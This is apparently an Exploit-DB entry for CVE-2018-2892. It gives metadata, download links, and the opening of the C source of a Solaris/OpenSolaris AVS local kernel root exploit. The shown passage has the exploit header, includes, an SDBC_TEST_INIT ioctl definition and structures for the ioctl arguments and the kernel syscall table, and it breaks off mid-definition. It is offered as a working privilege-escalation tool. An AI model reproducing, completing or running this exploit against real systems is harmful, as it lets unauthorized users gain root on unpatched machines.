EDB-ID: 45126 | Author: mu-b | Published: 2018-08-02 | CVE: CVE-2018-2892 | Type: Local | Platform: Solaris | Aliases: N/A | Advisory/Source: Link | Tags: Local | Vulnerable App: N/A | # Exploit Title: Solaris/OpenSolaris AVS kernel code execution
# Google Dork: [if applicable]
# Date: 24/7/2018
# Exploit Author: mu-b
# Vendor Homepage: oracle.com
# Software Link:
# Version: Solaris 10, Solaris <= 11.3
# Tested on: Solaris 11.X, OpenSolaris
# CVE : CVE-2018-2892
http://digit-labs.org/files/exploits/sdbc-testinit.c
http://digit-labs.org/files/exploits/sdbc-testinit-v2.c
a few more added to digit-labs as well, old irix-espd remote root for
irix as well.
/* sdbc-testinit.c
*
* Copyright (c) 2008 by <[email protected]>
*
* Sun Opensolaris <= snv_104 local kernel root exploit
* by mu-b - Sun 21 Dec 2008
*
* $Id: sdbc-testinit.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Opensolaris snv_104 (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl32_s {
unsigned int arg0;
unsigned int arg1;
unsigned int arg2;
unsigned int arg3;
unsigned int arg4;
unsigned int magic;
unsigned int ustatus;
unsigned int pad[1];
} _sdbc_ioctl32_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
